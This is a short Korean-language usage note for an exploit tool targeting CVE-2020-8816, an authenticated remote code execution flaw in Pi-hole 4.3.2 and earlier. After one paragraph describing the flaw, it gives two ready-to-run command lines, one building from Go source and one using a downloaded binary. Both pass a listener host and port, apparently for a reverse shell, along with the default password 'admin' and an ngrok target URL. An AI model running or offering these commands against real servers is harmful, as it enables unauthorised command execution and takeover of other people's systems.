
Pi-hole ( <= 4.3.2) 인증된 원격 코드 실행.
Pi-hole (버전 <= 4.3.2)는 원격 코드 실행 취약점의 영향을 받습니다. 웹 포털의 인증된 사용자는 서비스를 실행하는 로컬 사용자의 권한으로 기본 서버에서 임의의 명령을 실행할 수 있습니다.
go run CVE-2020-8816.go -host $LHOST -p $LPORT -pass admin -u http://4c9a7a45fa37.ngrok.io/admin/
또는 바이너리 CVE-2020-8816을 다운로드하세요 :
./CVE-2020-8816 -host $LHOST -p $LPORT -pass admin -u http://4c9a7a45fa37.ngrok.io/admin/